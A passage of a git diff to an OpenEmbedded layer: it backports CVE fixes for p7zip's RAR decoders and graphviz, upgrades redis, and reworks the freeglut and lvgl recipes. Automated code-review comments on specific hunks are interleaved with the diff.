m_OutWindowStream.GetProcessedSize(); + while (pos < unPackSize) + { +diff --git a/CPP/7zip/Compress/Rar2Decoder.h b/CPP/7zip/Compress/Rar2Decoder.h +index 3a0535c..0e9005f 100644 +--- a/CPP/7zip/Compress/Rar2Decoder.h ++++ b/CPP/7zip/Compress/Rar2Decoder.h +@@ -139,6 +139,7 @@ 
class CDecoder : + + UInt64 m_PackSize; + bool m_IsSolid; ++ bool m_TablesOK; + + void InitStructures(); + UInt32 ReadBits(unsigned numBits); +diff --git a/CPP/7zip/Compress/Rar3Decoder.cpp b/CPP/7zip/Compress/Rar3Decoder.cpp +index 3bf2513..6cb8a6a 100644 +--- a/CPP/7zip/Compress/Rar3Decoder.cpp ++++ b/CPP/7zip/Compress/Rar3Decoder.cpp +@@ -92,7 +92,8 @@ CDecoder::CDecoder(): + _writtenFileSize(0), + _vmData(0), + _vmCode(0), +- m_IsSolid(false) ++ m_IsSolid(false), ++ _errorMode(false) + { + Ppmd7_Construct(&_ppmd); + } +@@ -545,6 +546,9 @@ HRESULT CDecoder::ReadTables(bool &keepDecompressing) + return InitPPM(); + } + ++ TablesRead = false; ++ TablesOK = false; ++ + _lzMode = true; + PrevAlignBits = 0; + PrevAlignCount = 0; +@@ -606,6 +610,9 @@ HRESULT CDecoder::ReadTables(bool &keepDecompressing) + } + } + } ++ if (InputEofError()) ++ return S_FALSE; ++ + TablesRead = true; + + // original code has check here: +@@ -623,6 +630,9 @@ HRESULT CDecoder::ReadTables(bool &keepDecompressing) + RIF(m_LenDecoder.Build(&newLevels[kMainTableSize + kDistTableSize + kAlignTableSize])); + + memcpy(m_LastLevels, newLevels, kTablesSizesSum); ++ ++ TablesOK = true; ++ + return S_OK; + } + +@@ -824,7 +834,12 @@ HRESULT CDecoder::CodeReal(ICompressProgressInfo *progress) + PpmEscChar = 2; + PpmError = true; + InitFilters(); ++ _errorMode = false; + } ++ ++ if (_errorMode) ++ return S_FALSE; ++ + if (!m_IsSolid || !TablesRead) + { + bool keepDecompressing; +@@ -838,6 +853,8 @@ HRESULT CDecoder::CodeReal(ICompressProgressInfo *progress) + bool keepDecompressing; + if (_lzMode) + { ++ if (!TablesOK) ++ return S_FALSE; + RINOK(DecodeLZ(keepDecompressing)) + } + else +@@ -901,8 +918,8 @@ STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream + _unpackSize = outSize ? *outSize : (UInt64)(Int64)-1; + return CodeReal(progress); + } +- catch(const CInBufferException &e) { return e.ErrorCode; } +- catch(...) 
{ return S_FALSE; } ++ catch(const CInBufferException &e) { _errorMode = true; return e.ErrorCode; } ++ catch(...) { _errorMode = true; return S_FALSE; } + // CNewException is possible here. But probably CNewException is caused + // by error in data stream. + } +diff --git a/CPP/7zip/Compress/Rar3Decoder.h b/CPP/7zip/Compress/Rar3Decoder.h +index c130cec..2f72d7d 100644 +--- a/CPP/7zip/Compress/Rar3Decoder.h ++++ b/CPP/7zip/Compress/Rar3Decoder.h +@@ -192,6 +192,7 @@ class CDecoder: + UInt32 _lastFilter; + + bool m_IsSolid; ++ bool _errorMode; + + bool _lzMode; + bool _unsupportedFilter; +@@ -200,6 +201,7 @@ class CDecoder: + UInt32 PrevAlignCount; + + bool TablesRead; ++ bool TablesOK; + + CPpmd7 _ppmd; + int PpmEscChar; diff --git a/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb b/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb index 04923116cf..e795482eb6 100644 --- a/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb +++ b/meta-oe/recipes-extended/p7zip/p7zip_16.02.bb @@ -10,6 +10,8 @@ SRC_URI = "http://downloads.sourceforge.net/p7zip/p7zip/${PV}/p7zip_${PV}_src_al file://CVE-2017-17969.patch \ file://0001-Fix-narrowing-errors-Wc-11-narrowing.patch \ file://change_numMethods_from_bool_to_unsigned.patch \ + file://CVE-2018-5996.patch \ + file://CVE-2016-9296.patch \ " SRC_URI[md5sum] = "a0128d661cfe7cc8c121e73519c54fbf" diff --git a/meta-oe/recipes-extended/redis/redis-7/0001-src-Do-not-reset-FINAL_LIBS.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/0001-src-Do-not-reset-FINAL_LIBS.patch index e8d8b1d53f..e8d8b1d53f 100644 --- a/meta-oe/recipes-extended/redis/redis-7/0001-src-Do-not-reset-FINAL_LIBS.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/0001-src-Do-not-reset-FINAL_LIBS.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/0006-Define-correct-gregs-for-RISCV32.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/0006-Define-correct-gregs-for-RISCV32.patch index 01f8421811..385b0aeed0 100644 
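Review bot: In Rar1Decoder.cpp and Rar3Decoder.cpp the new `_errorMode` flag is set only in the catch handlers of `Code()`, so a failure that `CodeReal()` reports through its return value (such as the added `return S_FALSE` paths) leaves the flag clear and a following solid-stream call is not refused by it. Whether those paths can leave decoder state inconsistent is not visible in these hunks, and the patch header itself says "Hopefully fix". The flag is cleared only in the re-initialisation branch (`if (!m_IsSolid)` in Rar1; in Rar3 the enclosing condition is outside the hunk), so its contract deserves a comment at the declaration, e.g. `bool _errorMode; // latched when Code() threw; cleared only when decoder state is re-initialised`. The enclosing functions start and end outside the hunks.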
--- a/meta-oe/recipes-extended/redis/redis-7/0006-Define-correct-gregs-for-RISCV32.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/0006-Define-correct-gregs-for-RISCV32.patch @@ -1,4 +1,4 @@ -From f26a978c638bcbc621669dce0ab89e43af42af98 Mon Sep 17 00:00:00 2001 +From b6b2c652abfa98093401b232baca8719c50cadf4 Mon Sep 17 00:00:00 2001 From: Khem Raj <raj.khem@gmail.com> Date: Mon, 26 Oct 2020 21:32:22 -0700 Subject: [PATCH] Define correct gregs for RISCV32 @@ -6,18 +6,17 @@ Subject: [PATCH] Define correct gregs for RISCV32 Upstream-Status: Pending Signed-off-by: Khem Raj <raj.khem@gmail.com> -Updated patch for 6.2.1 -Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com> - +Updated patch for 6.2.8 +Signed-off-by: Changqing Li <changqing.li@windriver.com> --- src/debug.c | 26 ++++++++++++++++++++++++-- 1 file changed, 24 insertions(+), 2 deletions(-) diff --git a/src/debug.c b/src/debug.c -index 2da2c5d..1d778fa 100644 +index ebda858..90bc450 100644 --- a/src/debug.c +++ b/src/debug.c -@@ -1116,7 +1116,9 @@ static void *getMcontextEip(ucontext_t *uc) { +@@ -1168,7 +1168,9 @@ static void* getAndSetMcontextEip(ucontext_t *uc, void *eip) { #endif #elif defined(__linux__) /* Linux */ @@ -25,10 +24,10 @@ index 2da2c5d..1d778fa 100644 + #if defined(__riscv) && __riscv_xlen == 32 + return (void*) uc->uc_mcontext.__gregs[REG_PC]; + #elif defined(__i386__) || ((defined(__X86_64__) || defined(__x86_64__)) && defined(__ILP32__)) - return (void*) uc->uc_mcontext.gregs[14]; /* Linux 32 */ + GET_SET_RETURN(uc->uc_mcontext.gregs[14], eip); #elif defined(__X86_64__) || defined(__x86_64__) - return (void*) uc->uc_mcontext.gregs[16]; /* Linux 64 */ -@@ -1298,8 +1300,28 @@ void logRegisters(ucontext_t *uc) { + GET_SET_RETURN(uc->uc_mcontext.gregs[16], eip); +@@ -1350,8 +1352,28 @@ void logRegisters(ucontext_t *uc) { #endif /* Linux */ #elif defined(__linux__) 
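Review bot: The refreshed header of redis-7.0.13/0006-Define-correct-gregs-for-RISCV32.patch removes the earlier `Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>` line instead of appending the new sign-off beneath it, which loses part of the patch's provenance chain. Keep the existing trailer and add the new one after it. The note `Updated patch for 6.2.8` also does not match the directory the file now lives in (redis-7.0.13), so the version in that line should be checked.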
@@ -58,3 +57,6 @@ index 2da2c5d..1d778fa 100644 serverLog(LL_WARNING, "\n" "EAX:%08lx EBX:%08lx ECX:%08lx EDX:%08lx\n" +-- +2.25.1 + diff --git a/meta-oe/recipes-extended/redis/redis-7/GNU_SOURCE.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/GNU_SOURCE-7.patch index 6e07c25c6a..6e07c25c6a 100644 --- a/meta-oe/recipes-extended/redis/redis-7/GNU_SOURCE.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/GNU_SOURCE-7.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/hiredis-use-default-CC-if-it-is-set.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/hiredis-use-default-CC-if-it-is-set.patch index 657b0923e2..657b0923e2 100644 --- a/meta-oe/recipes-extended/redis/redis-7/hiredis-use-default-CC-if-it-is-set.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/hiredis-use-default-CC-if-it-is-set.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/init-redis-server b/meta-oe/recipes-extended/redis/redis-7.0.13/init-redis-server index 6014d70c0e..6014d70c0e 100755 --- a/meta-oe/recipes-extended/redis/redis-7/init-redis-server +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/init-redis-server diff --git a/meta-oe/recipes-extended/redis/redis-7/lua-update-Makefile-to-use-environment-build-setting.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/lua-update-Makefile-to-use-environment-build-setting.patch index c6c6fde162..c6c6fde162 100644 --- a/meta-oe/recipes-extended/redis/redis-7/lua-update-Makefile-to-use-environment-build-setting.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/lua-update-Makefile-to-use-environment-build-setting.patch diff --git a/meta-oe/recipes-extended/redis/redis-7/oe-use-libc-malloc.patch b/meta-oe/recipes-extended/redis/redis-7.0.13/oe-use-libc-malloc.patch index bf6d0cf3c1..bf6d0cf3c1 100644 --- a/meta-oe/recipes-extended/redis/redis-7/oe-use-libc-malloc.patch +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/oe-use-libc-malloc.patch 
diff --git a/meta-oe/recipes-extended/redis/redis-7/redis.conf b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.conf index 75037d6dc8..75037d6dc8 100644 --- a/meta-oe/recipes-extended/redis/redis-7/redis.conf +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.conf diff --git a/meta-oe/recipes-extended/redis/redis-7/redis.service b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.service index 36d29852da..a52204cc70 100644 --- a/meta-oe/recipes-extended/redis/redis-7/redis.service +++ b/meta-oe/recipes-extended/redis/redis-7.0.13/redis.service @@ -9,6 +9,7 @@ ExecStart=/usr/bin/redis-server /etc/redis/redis.conf ExecStop=/usr/bin/redis-cli shutdown Restart=always LimitNOFILE=10032 +Type=notify [Install] WantedBy=multi-user.target diff --git a/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch b/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch index b2d1a32eda..9d7e502717 100644 --- a/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch +++ b/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch @@ -1,4 +1,4 @@ -From 6134b471c35df826ccb41aab9a47e5c89e15a0c4 Mon Sep 17 00:00:00 2001 +From 26bd72f3b8de22e5036d86e6c79f815853b83473 Mon Sep 17 00:00:00 2001 From: Khem Raj <raj.khem@gmail.com> Date: Mon, 26 Oct 2020 21:32:22 -0700 Subject: [PATCH] Define correct gregs for RISCV32 @@ -13,10 +13,10 @@ Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com> 1 file changed, 24 insertions(+), 2 deletions(-) diff --git a/src/debug.c b/src/debug.c -index e7fec29..5abb404 100644 +index 5318c14..8c21b47 100644 --- a/src/debug.c +++ b/src/debug.c -@@ -1039,7 +1039,9 @@ static void *getMcontextEip(ucontext_t *uc) { +@@ -1055,7 +1055,9 @@ static void* getAndSetMcontextEip(ucontext_t *uc, void *eip) { #endif #elif defined(__linux__) /* Linux */ 
@@ -24,10 +24,10 @@ index e7fec29..5abb404 100644 + #if defined(__riscv) && __riscv_xlen == 32 + return (void*) uc->uc_mcontext.__gregs[REG_PC]; + #elif defined(__i386__) || ((defined(__X86_64__) || defined(__x86_64__)) && defined(__ILP32__)) - return (void*) uc->uc_mcontext.gregs[14]; /* Linux 32 */ + GET_SET_RETURN(uc->uc_mcontext.gregs[14], eip); #elif defined(__X86_64__) || defined(__x86_64__) - return (void*) uc->uc_mcontext.gregs[16]; /* Linux 64 */ -@@ -1206,8 +1208,28 @@ void logRegisters(ucontext_t *uc) { + GET_SET_RETURN(uc->uc_mcontext.gregs[16], eip); +@@ -1222,8 +1224,28 @@ void logRegisters(ucontext_t *uc) { #endif /* Linux */ #elif defined(__linux__) @@ -57,3 +57,6 @@ index e7fec29..5abb404 100644 serverLog(LL_WARNING, "\n" "EAX:%08lx EBX:%08lx ECX:%08lx EDX:%08lx\n" +-- +2.25.1 + diff --git a/meta-oe/recipes-extended/redis/redis_6.2.7.bb b/meta-oe/recipes-extended/redis/redis_6.2.12.bb index 7f922a4e0f..3ed6867816 100644 --- a/meta-oe/recipes-extended/redis/redis_6.2.7.bb +++ b/meta-oe/recipes-extended/redis/redis_6.2.12.bb @@ -17,7 +17,7 @@ SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ file://GNU_SOURCE.patch \ file://0006-Define-correct-gregs-for-RISCV32.patch \ " -SRC_URI[sha256sum] = "b7a79cc3b46d3c6eb52fa37dde34a4a60824079ebdfb3abfbbfa035947c55319" +SRC_URI[sha256sum] = "75352eef41e97e84bfa94292cbac79e5add5345fc79787df5cbdff703353fb1b" inherit autotools-brokensep update-rc.d systemd useradd diff --git a/meta-oe/recipes-extended/redis/redis_7.0.4.bb b/meta-oe/recipes-extended/redis/redis_7.0.13.bb index 993ff34b10..e88ab4ddf5 100644 --- a/meta-oe/recipes-extended/redis/redis_7.0.4.bb +++ b/meta-oe/recipes-extended/redis/redis_7.0.13.bb @@ -6,8 +6,6 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=8ffdd6c926faaece928cf9d9640132d2" DEPENDS = "readline lua ncurses" -FILESPATH =. "${FILE_DIRNAME}/${PN}-7:" - SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ file://redis.conf \ file://init-redis-server \ 
@@ -16,10 +14,10 @@ SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ file://lua-update-Makefile-to-use-environment-build-setting.patch \ file://oe-use-libc-malloc.patch \ file://0001-src-Do-not-reset-FINAL_LIBS.patch \ - file://GNU_SOURCE.patch \ + file://GNU_SOURCE-7.patch \ file://0006-Define-correct-gregs-for-RISCV32.patch \ " -SRC_URI[sha256sum] = "f0e65fda74c44a3dd4fa9d512d4d4d833dd0939c934e946a5c622a630d057f2f" +SRC_URI[sha256sum] = "97065774d5fb8388eb0d8913458decfcb167d356e40d31dd01cd30c1cc391673" inherit autotools-brokensep update-rc.d systemd useradd @@ -35,7 +33,10 @@ USERADD_PACKAGES = "${PN}" USERADD_PARAM:${PN} = "--system --home-dir /var/lib/redis -g redis --shell /bin/false redis" GROUPADD_PARAM:${PN} = "--system redis" -REDIS_ON_SYSTEMD = "${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}" +PACKAGECONFIG = "${@bb.utils.filter('DISTRO_FEATURES', 'systemd', d)}" +PACKAGECONFIG[systemd] = "USE_SYSTEMD=yes,USE_SYSTEMD=no,systemd" + +EXTRA_OEMAKE += "${PACKAGECONFIG_CONFARGS}" do_compile:prepend() { (cd deps && oe_runmake hiredis lua linenoise) @@ -55,8 +56,9 @@ do_install() { install -m 0644 ${WORKDIR}/redis.service ${D}${systemd_system_unitdir} sed -i 's!/usr/sbin/!${sbindir}/!g' ${D}${systemd_system_unitdir}/redis.service - if [ "${REDIS_ON_SYSTEMD}" = true ]; then + if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then sed -i 's!daemonize yes!# daemonize yes!' ${D}/${sysconfdir}/redis/redis.conf + sed -i 's!supervised no!supervised systemd!' ${D}/${sysconfdir}/redis/redis.conf fi } diff --git a/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb b/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb index 6ef9f74c70..2f4f16589d 100644 --- a/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb +++ b/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb 
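Review bot: The `do_install` condition tests `DISTRO_FEATURES`, while the build flag `USE_SYSTEMD=yes`/`USE_SYSTEMD=no` now follows `PACKAGECONFIG[systemd]`, so the two can disagree. If the distro has the systemd feature but `PACKAGECONFIG` is overridden without it, redis.conf is still switched to `supervised systemd` and redis.service (changed in the same commit) carries `Type=notify`, while the binary is built with `USE_SYSTEMD=no`; presumably readiness is then never signalled and the unit fails on start timeout and restarts under `Restart=always`. Testing the same variable keeps them aligned: `if ${@bb.utils.contains('PACKAGECONFIG', 'systemd', 'true', 'false', d)}; then`. The added `sed -i 's!supervised no!supervised systemd!'` also changes nothing if the shipped redis.conf lacks that exact line, and the file's content is not visible here. `do_install` starts outside the hunk.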
@@ -7,14 +7,24 @@ SRC_URI = "https://sourceforge.net/projects/${BPN}/files/${BPN}/${PV}/${BPN}-${P SRC_URI[md5sum] = "cd5c670c1086358598a6d4a9d166949d" SRC_URI[sha256sum] = "d4000e02102acaf259998c870e25214739d1f16f67f99cb35e4f46841399da68" -inherit cmake features_check +inherit cmake features_check pkgconfig -# depends on virtual/libx11, virtual/libgl -REQUIRED_DISTRO_FEATURES = "x11 opengl" +# depends on virtual/libgl +REQUIRED_DISTRO_FEATURES = "opengl" +PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'wayland x11', d)}" +PACKAGECONFIG[gles] = "-DFREEGLUT_GLES=ON,-DFREEGLUT_GLES=OFF," +PACKAGECONFIG[wayland] = "-DFREEGLUT_WAYLAND=ON,-DFREEGLUT_WAYLAND=OFF,libxkbcommon" +PACKAGECONFIG[demos] = "-DFREEGLUT_BUILD_DEMOS=ON,-DFREEGLUT_BUILD_DEMOS=OFF," +PACKAGECONFIG[x11] = ",,virtual/libx11 libice libxmu libglu libxrandr libxext" # Do not use -fno-common, check back when upgrading to new version it might not be needed CFLAGS += "-fcommon" PROVIDES += "mesa-glut" -DEPENDS = "virtual/libx11 libxmu libxi virtual/libgl libglu libxrandr" +DEPENDS = "virtual/libgl libxi" + +do_install:append() { + # Remove buildpaths + sed -i "s#${RECIPE_SYSROOT}##g" ${D}${libdir}/cmake/FreeGLUT/FreeGLUTTargets.cmake +} diff --git a/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-1.patch b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-1.patch new file mode 100644 index 0000000000..a48f8aa06a --- /dev/null +++ b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-1.patch 
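Review bot: `DEPENDS = "virtual/libgl libxi"` keeps an X11 library as an unconditional dependency, although `REQUIRED_DISTRO_FEATURES` no longer asks for x11 and the other X11 libraries moved into `PACKAGECONFIG[x11]`. On a Wayland-only distro the libxi dependency would presumably be unbuildable or pull X11 back in. Moving it with the rest gives `PACKAGECONFIG[x11] = ",,virtual/libx11 libice libxmu libxi libglu libxrandr libxext"` and `DEPENDS = "virtual/libgl"`. When both features are set, the default enables `wayland` and `x11` together, so `-DFREEGLUT_WAYLAND=ON` is passed while the X11 libraries are still in the dependencies; a comment saying which backend is meant to win would help.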
@@ -0,0 +1,38 @@
+From 361f274ca901c3c476697a6404662d95f4dd43cb Mon Sep 17 00:00:00 2001
+From: Matthew Fernandez <matthew.fernandez@gmail.com>
+Date: Fri, 12 Jan 2024 17:06:17 +1100
+Subject: [PATCH] gvc gvconfig_plugin_install_from_config: more tightly scope
+ 'gv_api'
+
+Upstream-Status: Backport [https://gitlab.com/graphviz/graphviz/-/commit/361f274ca901c3c476697a6404662d95f4dd43cb]
+CVE: CVE-2023-46045
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ lib/gvc/gvconfig.c | 3 +--
+ 1 file changed, 1 insertion(+), 2 deletions(-)
+
+diff --git a/lib/gvc/gvconfig.c b/lib/gvc/gvconfig.c
+index 2d86321..f9d1dcc 100644
+--- a/lib/gvc/gvconfig.c
++++ b/lib/gvc/gvconfig.c
+@@ -173,7 +173,6 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s)
+ {
+ char *package_path, *name, *api;
+ const char *type;
+- api_t gv_api;
+ int quality, rc;
+ int nest = 0;
+ gvplugin_package_t *package;
+@@ -188,7 +187,7 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s)
+ package = gvplugin_package_record(gvc, package_path, name);
+ do {
+ api = token(&nest, &s);
+- gv_api = gvplugin_api(api);
++ const api_t gv_api = gvplugin_api(api);
+ do {
+ if (nest == 2) {
+ type = token(&nest, &s);
+--
+2.40.0
+
diff --git a/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-2.patch b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-2.patch
new file mode 100644
index 0000000000..4c70b1a877
--- /dev/null
+++ b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-2.patch
@@ -0,0 +1,39 @@
+From 3f31704cafd7da3e86bb2861accf5e90c973e62a Mon Sep 17 00:00:00 2001
+From: Matthew Fernandez <matthew.fernandez@gmail.com>
+Date: Fri, 12 Jan 2024 17:06:17 +1100
+Subject: [PATCH] gvc gvconfig_plugin_install_from_config: more tightly scope
+ 'api'
+
+Upstream-Status: Backport [https://gitlab.com/graphviz/graphviz/-/commit/3f31704cafd7da3e86bb2861accf5e90c973e62a]
+CVE: CVE-2023-46045
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ lib/gvc/gvconfig.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/lib/gvc/gvconfig.c b/lib/gvc/gvconfig.c
+index f9d1dcc..95e8c6c 100644
+--- a/lib/gvc/gvconfig.c
++++ b/lib/gvc/gvconfig.c
+@@ -171,7 +171,7 @@ static char *token(int *nest, char **tokens)
+
+ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s)
+ {
+- char *package_path, *name, *api;
++ char *package_path, *name;
+ const char *type;
+ int quality, rc;
+ int nest = 0;
+@@ -186,7 +186,7 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s)
+ name = "x";
+ package = gvplugin_package_record(gvc, package_path, name);
+ do {
+- api = token(&nest, &s);
++ const char *api = token(&nest, &s);
+ const api_t gv_api = gvplugin_api(api);
+ do {
+ if (nest == 2) {
+--
+2.40.0
+
diff --git a/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-3.patch b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-3.patch
new file mode 100644
index 0000000000..4746265eeb
--- /dev/null
+++ b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-3.patch
@@ -0,0 +1,31 @@
+From a95f977f5d809915ec4b14836d2b5b7f5e74881e Mon Sep 17 00:00:00 2001
+From: Matthew Fernandez <matthew.fernandez@gmail.com>
+Date: Fri, 12 Jan 2024 17:06:17 +1100
+Subject: [PATCH] gvc: detect plugin installation failure and display an error
+
+Upstream-Status: Backport [https://gitlab.com/graphviz/graphviz/-/commit/a95f977f5d809915ec4b14836d2b5b7f5e74881e]
+CVE: CVE-2023-46045
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ lib/gvc/gvconfig.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/lib/gvc/gvconfig.c b/lib/gvc/gvconfig.c
+index 95e8c6c..77d0865 100644
+--- a/lib/gvc/gvconfig.c
++++ b/lib/gvc/gvconfig.c
+@@ -188,6 +188,10 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s)
+ do {
+ const char *api = token(&nest, &s);
+ const api_t gv_api = gvplugin_api(api);
++ if (gv_api == (api_t)-1) {
++ agerr(AGERR, "config error: %s %s not found\n", package_path, api);
++ return 0;
++ }
+ do {
+ if (nest == 2) {
+ type = token(&nest, &s);
+--
+2.40.0
+
diff --git a/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb b/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb
index 4c51af669c..f06e2adb02 100644
--- a/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb
+++ b/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb
@@ -20,6 +20,9 @@ DEPENDS:append:class-nativesdk = " ${BPN}-native" inherit autotools-brokensep pkgconfig gettext qemu SRC_URI = "https://gitlab.com/api/v4/projects/4207231/packages/generic/${BPN}-releases/${PV}/${BP}.tar.xz \ + file://CVE-2023-46045-1.patch \ + file://CVE-2023-46045-2.patch \ + file://CVE-2023-46045-3.patch \ " # Use native mkdefs SRC_URI:append:class-target = "\
diff --git a/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb b/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb
index 1a94215839..7f93f704e0 100644
--- a/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb
+++ b/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb
@@ -9,7 +9,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=d6fc0df890c5270ef045981b516bb8f2" # TODO: Pin upstream release (current v7.11.0-80-g419a757) -SRC_URI = "git://github.com/lvgl/lv_drivers;destsuffix=${S};protocol=https;nobranch=1" +SRC_URI = "git://github.com/lvgl/lv_drivers;protocol=https;branch=master" SRCREV = "419a757c23aaa67c676fe3a2196d64808fcf2254" DEPENDS = "libxkbcommon lvgl wayland" @@ -19,15 +19,15 @@ REQUIRED_DISTRO_FEATURES = "wayland" inherit cmake inherit features_check -S = "${WORKDIR}/${PN}-${PV}" +S = "${WORKDIR}/git" LVGL_CONFIG_WAYLAND_HOR_RES ?= "480" LVGL_CONFIG_WAYLAND_VER_RES ?= "320" -EXTRA_OECMAKE += "-Dinstall:BOOL=ON -DLIB_INSTALL_DIR=${BASELIB}" +EXTRA_OECMAKE += "-Dinstall:BOOL=ON -DLIB_INSTALL_DIR=${baselib}" TARGET_CFLAGS += "-DLV_CONF_INCLUDE_SIMPLE=1" -TARGET_CFLAGS += "-I${RECIPE_SYSROOT}/${includedir}/lvgl" +TARGET_CFLAGS += "-I${STAGING_INCDIR}/lvgl" # Upstream does not support a default configuration # but propose a default "disabled" template, which is used as reference diff --git a/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb b/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb index 032e85f522..0049bbe237 100644 --- a/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb +++ b/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb 
@@ -8,21 +8,23 @@ DESCRIPTION = "Allow the use of PNG images in LVGL. This implementation uses lod LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=d6fc0df890c5270ef045981b516bb8f2" -SRC_URI = "git://github.com/lvgl/lv_lib_png;destsuffix=${S};protocol=https;nobranch=1" +SRC_URI = "git://github.com/lvgl/lv_lib_png;;protocol=https;branch=master" SRCREV = "bf1531afe07c9f861107559e29ab8a2d83e4715a" +S = "${WORKDIR}/git" + # because of lvgl dependency REQUIRED_DISTRO_FEATURES = "wayland" DEPENDS += "lvgl" -EXTRA_OECMAKE += "-DLIB_INSTALL_DIR=${BASELIB}" +EXTRA_OECMAKE += "-DLIB_INSTALL_DIR=${baselib}" inherit cmake inherit features_check TARGET_CFLAGS += "-DLV_CONF_INCLUDE_SIMPLE=1" -TARGET_CFLAGS += "-I${RECIPE_SYSROOT}/${includedir}/lvgl" +TARGET_CFLAGS += "-I${STAGING_INCDIR}/lvgl" FILES:${PN}-dev = "\ ${includedir}/lvgl/lv_lib_png/ \ diff --git a/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb b/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb index 2005afa2fd..0021da01fb 100644 --- a/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb +++ b/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb @@ -8,7 +8,7 @@ SUMMARY = "Light and Versatile Graphics Library" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENCE.txt;md5=bf1198c89ae87f043108cea62460b03a" -SRC_URI = "gitsm://github.com/lvgl/lvgl;destsuffix=${S};protocol=https;nobranch=1" +SRC_URI = "gitsm://github.com/lvgl/lvgl;protocol=https;branch=master" SRCREV = "d38eb1e689fa5a64c25e677275172d9c8a4ab2f0" REQUIRED_DISTRO_FEATURES = "wayland" @@ -16,8 +16,8 @@ REQUIRED_DISTRO_FEATURES = "wayland" inherit cmake inherit features_check -EXTRA_OECMAKE = "-DLIB_INSTALL_DIR=${BASELIB}" -S = "${WORKDIR}/${PN}-${PV}" +EXTRA_OECMAKE = "-DLIB_INSTALL_DIR=${baselib}" +S = "${WORKDIR}/git" LVGL_CONFIG_LV_MEM_CUSTOM ?= "0" diff --git a/meta-oe/recipes-graphics/openjpeg/openjpeg/CVE-2021-3575.patch b/meta-oe/recipes-graphics/openjpeg/openjpeg/CVE-2021-3575.patch new file mode 100644 index 0000000000..0322f55cc7 --- /dev/null 
